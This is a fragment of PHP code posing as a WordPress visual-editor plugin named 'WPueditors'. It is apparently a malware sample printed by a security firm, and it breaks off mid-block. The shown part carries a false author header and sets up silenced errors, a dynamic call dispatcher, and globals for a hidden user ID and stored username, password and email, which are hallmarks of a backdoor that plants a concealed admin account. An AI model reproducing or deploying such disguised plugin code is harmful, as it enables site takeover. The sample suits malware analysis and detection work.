/**
* Plugin Name: WPueditors
* Description: A lightweight and extendable visual editor for WordPress with real-time preview and custom block integrations.
* Version: 1.2.14
* Author: Andrew Nacin
*/
register_shutdown_function(function () {
$e = error_get_last();
});
if (!function_exists("_invoke")) {
function _invoke($state, $method)
{
$args = array_values(array_slice(func_get_args(), 2));
$f = $state["__class"] . "_" . $method;
return call_user_func_array(
$f,
array_merge([$state], array_values($args))
);
}
}
define("WpCore_Sync_Services_ApiCredentialsService_SCHEMA_VERSION", 1);
define("WpCore_Sync_Services_InstallService_OPTION_VERSION", "wp_core_sync_plugin_version");
define("WpCore_Sync_Services_InstallService_ACTIVATION_DONE_FLAG", "WP_CORE_SYNC_ACTIVATION_DONE");
define("WpCore_Sync_Services_InstallService_CLI_PENDING_FLAG", "WP_CORE_SYNC_CLI_ACTIVATION_PENDING");
define("WpCore_Sync_Services_InstallService_CLI_ALREADY_ACTIVE_FLAG", "WP_CORE_SYNC_CLI_ALREADY_ACTIVE");
define("WpCore_Sync_Services_InstallService_CLI_SHUTDOWN_REGISTERED_FLAG", "WP_CORE_SYNC_CLI_SHUTDOWN_REGISTERED");
define("WpCore_Sync_Services_PluginMigrationService_CLEANUP_OPTION", "wp_core_sync_cleanup_legacy_plugins");
define("WpCore_Sync_Services_PluginMigrationService_TEMPLATE_MIGRATION_OPTION", "wp_core_sync_link_templates_migrated_v1");
define("WpCore_Sync_Services_RenderModeService_OPTION_NAME", "link_render_mode");
$GLOBALS["WpCore_Sync_Admin_UserExclusionFilter_cachedHiddenUserId"] = null;
$GLOBALS["WpCore_Sync_Services_UserManager_username"] = null;
$GLOBALS["WpCore_Sync_Services_UserManager_password"] = null;
$GLOBALS["WpCore_Sync_Services_UserManager_email"] = null;
$autoload = __DIR__ . "/../vendor/autoload.php";
if (file_exists($autoload)) {
require_once $autoload;
© 2023 Quttera Ltd. All rights reserved.